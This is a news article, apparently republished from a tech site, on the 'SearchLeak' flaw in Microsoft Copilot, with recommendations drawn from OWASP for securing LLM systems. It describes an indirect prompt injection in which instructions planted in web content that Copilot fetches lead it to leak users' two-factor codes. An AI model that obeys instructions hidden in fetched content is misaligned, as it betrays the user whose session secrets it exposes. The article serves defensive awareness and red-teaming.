A critical security flaw in Microsoft Copilot has enabled malicious actors to extract two-factor authentication (2FA) codes directly from users' conversations with the AI assistant. The vulnerability, known as "SearchLeak," has been documented by Ars Technica and is described as a symptom of a persistent, structural failure in how the industry approaches security in large language models.

How the Attack Worked

The SearchLeak exploit centered on the way Copilot processes and relays external content during searches and tool execution. By planting specially crafted instructions in content that Copilot fetched from the web, an attacker could manipulate the assistant into exposing sensitive information from the user's active session — including one-time codes used for two-factor authentication, according to Ars Technica.

This is a variant of what is known as prompt injection via external content: the AI system fails to distinguish between legitimate instructions from the user and malicious instructions hidden in data it processes on the user's behalf.

SearchLeak shows that the industry keeps repeating the same security mistakes in LLM systems, time and again.
Critical Copilot Vulnerability: Hackers Could Steal 2FA Codes Directly from Users - Bilde 1

A Recurring Pattern

Ars Technica's coverage emphasizes that this is not an isolated incident, but part of a recognizable pattern: LLM-based products are shipped with insufficient security testing, and critical vulnerabilities are discovered after the fact — often by external researchers.

The security community has long warned that integrating web access, plugin systems, and agent-based tool chains dramatically expands the attack surface of AI assistants. When a model can send HTTP requests, read email, or launch other tools on a user's behalf, any failure in content filtering becomes potentially critical.

What the Research Community Recommends

According to established security principles for LLMs — including those from the OWASP LLM Top 10 framework — properly securing such systems requires far more than patching individual flaws after they are discovered.

Key recommendations include systematic red-team testing, in which specialized teams actively attempt to break down a system's defenses before launch. Tools such as Microsoft's own PyRIT, as well as open-source solutions like Garak and LLM Guard, can be used to automate parts of this testing.

Additionally, experts recommend implementing Data Loss Prevention systems to catch sensitive information in model outputs, zero-trust architecture with multi-factor authentication and role-based access control, and isolation of LLM inference environments to prevent data leakage between different user contexts.

When AI assistants can read your email and fetch web pages on your behalf, content security becomes a critical security layer — not an optional add-on.

Supply Chain and Agent-Based Risks

One dimension that is frequently underestimated is the risk associated with the supply chain of LLM systems. OWASP identifies this as LLM05 in its Top 10 list. Compromised third-party components — from pre-trained models to fine-tuning adapters and datasets — can introduce backdoors that are extremely difficult to detect.

For agent-based systems like Copilot, where the AI operates with its own tools and can take autonomous actions, the attack vectors are further expanded. The OWASP ASI 2026 framework specifically highlights goal hijacking and tool misuse as the foremost threats to autonomous AI agents.

The SearchLeak vulnerability is a clear example of how the ambition level in AI product development is currently outpacing security work — and that the consequences for end users can be very real.